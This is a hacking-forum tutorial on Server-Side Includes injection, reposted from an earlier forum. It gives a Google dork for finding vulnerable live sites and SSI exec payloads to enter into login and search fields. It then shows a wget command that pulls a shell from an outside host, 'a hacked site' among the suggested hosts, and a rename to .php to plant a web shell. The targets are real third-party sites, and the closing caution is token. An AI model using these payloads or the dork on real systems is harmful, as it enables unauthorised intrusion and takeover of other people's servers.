[SSI] Server-Side Includes Injection. [Tutorial]
[SSI] Server-Side Includes Injection.

Just reposting som good and notable threads from my previous (now dead) home forum; Hacksociety.

Credits: ๖ۣۜΗ α x O r ♥

Things you will need:
  1. Site vulnerable to SSI injection (I will be giving few dorks and few vulnerable sites to practice on)
  2. Common sense.

What is SSI?

SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before they are inserted into a server-side interpreted HTML file.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

If an attacker submits a Server-side Include statement, he may have the ability to execute arbitrary operating system commands, or include a restricted file's contents the next time the page is served.

Source: Wikipedia/etc
Finding a vulnerable site
I will provide few dorks for this tipe of injection.
Best dork i found is inurl:bin/Cklb/ but it gave about 863 results so not that usable.

Lets get to work shall we

Enter inurl:bin/Cklb/ in Google and go testing...
Testing a site
So when you used that dork and you opened one site now you must determine id the site is vulnerable to this type of injection.

Here are some commands you can use:
Credits: Stewie™
Code [Expanded]:

<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"-->
Will show which user is running on the server

<!--#exec cmd="ls -a" --> (Linux)
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows)
Will display all files in the directory

Now take one of the commands and insert it in search boxes or login fields.
Mostly login fields are vulnerable but there is some cases when search boxes are vulnerable.

NOTE: You most enter your command into both fields (If login are vulnerable!!)

And when insert any command:
code Wrote:<!--#exec cmd="ls -a" -->

[Image: regionyo.png]

[Image: regionoq.png]

Now we see that our command successfully executed and that our site is vulnerable....
Spawning a shell
So we have our vulnerable site and we are ready to upload a shell.
First of all you will need a .TXT of your favourite shell (Host it somewhere free hosting,hacked site or anything you got)

Now we must download it to our site like this:
code Wrote:<!--#exec cmd="wget http://website.com/dir/shell.txt" -->

So insert your site where your shell is hosted in the command and you are ready to go.

Now just paste it into the fields and press Login or Enter.

[Image: regiontv.png]

To see if your .TXT file downloaded execute the command we used before:
Code Wrote:<!--#exec cmd="ls -a" -->

[Image: regionwt.png]

If you see that it downloaded successfully now you must rename it from .txt to .php!
You can use this command

code Wrote:<!--#exec cmd="mv shell.txt shell.php" -->

You rename filenames what ever you need (Offcourse you will need to put your .TXT name first.)

My command:

code Wrote:<!--#exec cmd="mv config1.txt config.php" -->

Now again list the files and try to find your file now.
If you did now just access it.

[Image: regionr.png]

That would be end of this tutorial.
I hope you learned something and do not rape sites with this
(Be smart and use them)

Further reading: https://owasp.org/www-community/attacks/..._Injection

Messages In This Thread
[SSI] Server-Side Includes Injection. [Tutorial] - by Insider - 03-27-2020, 02:22 AM

Possibly Related Threads…
Thread Author Replies Views Last Post
  Command Injection Insider 1 17,705 03-24-2021, 04:04 AM
Last Post: Vector
  CRLF Injection - Manipulating an HTTP Request Insider 1 20,414 06-16-2020, 12:38 PM
Last Post: dropzone
  [Tutorial] XSS through Exif headers Insider 1 18,581 06-16-2020, 11:51 AM
Last Post: LaZr4us
  [Tutorial] PHP CGI exploit Insider 0 17,211 06-16-2020, 11:34 AM
Last Post: Insider